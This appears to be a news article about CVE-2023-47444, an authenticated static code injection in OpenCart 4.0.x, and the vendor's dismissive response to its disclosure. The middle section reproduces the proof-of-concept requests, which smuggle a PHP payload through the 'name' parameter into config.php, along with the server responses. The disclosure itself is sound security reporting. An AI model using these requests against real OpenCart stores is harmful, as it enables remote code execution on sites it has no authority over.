Security Researcher Discloses OpenCart Vulnerability


A security researcher who goes under the name “0xbro” discovered a Static code injection vulnerability in OpenCart, which allows the writing of arbitrary untrusted data on config.php and admin/config.php files that could result in remote code execution.

This vulnerability was assigned CVE-2023-47444, and the severity was 8.8 (High).

However, a responsible disclosure was made from the security researcher to OpenCart, which was not responded to politely. The administrator, who goes by the name Daniel Kerr, responded to his report saying, “ur a f**kng tim.e waster“.

CVE-2023-47444: Authenticated Static Code Injections in OpenCart

This vulnerability exists in OpenCart versions 4.0.0.0 to 4.0.2.3, which allows an authenticated user with common/security “access” and “modify” privileges to write untrusted arbitrary data to the config.php and admin/config.php which could result in remote code execution.

This vulnerability existed on two functions, one of which moves the storage folder outside the application web root and another that renames the secret admin path after the installation.

Document

Free Webinar

In the upcoming webinar, Karthik Krishnamoorthy, CTO and Vivek Gopalan, VP of Products at Indusface demonstrate how APIs could be hacked. The session will cover: an exploit of OWASP API Top 10 vulnerability, a brute force account take-over (ATO) attack on API, a DDoS attack on an API, how a WAAP could bolster security over an API gateway


Prerequisites and Proof of Concept

In order to exploit this vulnerability, the threat actor must possess valid credentials to the backend dashboard along with written permission on the common/security. In addition to this, the admin/ folder must be a default one and not renamed.

Proof-of-concept (Source: 0xbro)
Proof-of-concept (Source: 0xbro)

As per the proof-of-concept for this vulnerability, the requests must be sent in two directions.

  1. route=common/security.storage&name=pwned’);phpinfo();%23&path=&user_token=
  2. route=common/security.storage&name=pwned’);phpinfo();%23&path=&user_token=&page=99

First Request

GET /admin_secret/index.php?route=common/security.storage&name=pwned’);phpinfo();%23&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad HTTP/1.1Host: 127.0.0.1:8888Cookie: OCSESSID=fbc47c7e5098550f0c12070be0
— RESPONSE —
HTTP/1.1 200 OK
{“next”:”http://127.0.0.1:8888/admin_secret/index.php?route=common/security.storage&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&name=pwned’);phpinfo();#&path=/home/kali/Projects/OpenCart/4.0.2.3/&page=2″}

Second Request

GET /admin_secret/index.php?route=common/security.storage&name=pwned’);phpinfo();%23&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&page=99 HTTP/1.1Host: 127.0.0.1:8888Cookie: OCSESSID=fbc47c7e5098550f0c12070be0
— RESPONSE —
HTTP/1.1 200 OK
{“success”:”Success: Storage directory has been moved!”}

Adding to the response from OpenCart, the administrators also closed the pull request on GitHub, mentioning it as a “non-vulnerability”. However, the fix was later merged into the master.

A complete report about this vulnerability and the OpenCart response has been published, providing detailed information on the proof-of-concept and other information.

Experience how StorageGuard eliminates the security blind spots in your storage systems by trying a 14-day free trial.



Source link